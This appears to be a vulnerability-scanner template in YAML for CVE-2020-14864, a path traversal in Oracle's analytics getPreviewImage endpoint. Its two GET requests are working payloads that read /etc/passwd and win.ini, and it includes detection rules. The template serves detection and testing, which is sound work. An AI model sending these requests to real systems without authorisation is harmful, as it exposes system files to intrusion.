id: oracle-ebs-getpreviewimage-lfi
info:
  name: Oracle EBS getPreviewImage Path Traversal (CVE-2020-14864)
  risk: High
  confidence: Certain

params:
  - root: "{{.BaseURL}}"

replicate:
  prefixes: 'OA_HTML'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "root:") && StringSearch("body", "bin/bash")

  - method: GET
    redirect: false
    url: >-
      {{.root}}/analytics/saw.dll?getPreviewImage&previewFilePath=c:/windows/win.ini
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && (StringSearch("response", "[extensions]") || StringSearch("response", "[fonts]"))

references:
  - links:
      - https://www.exploit-db.com/exploits/48964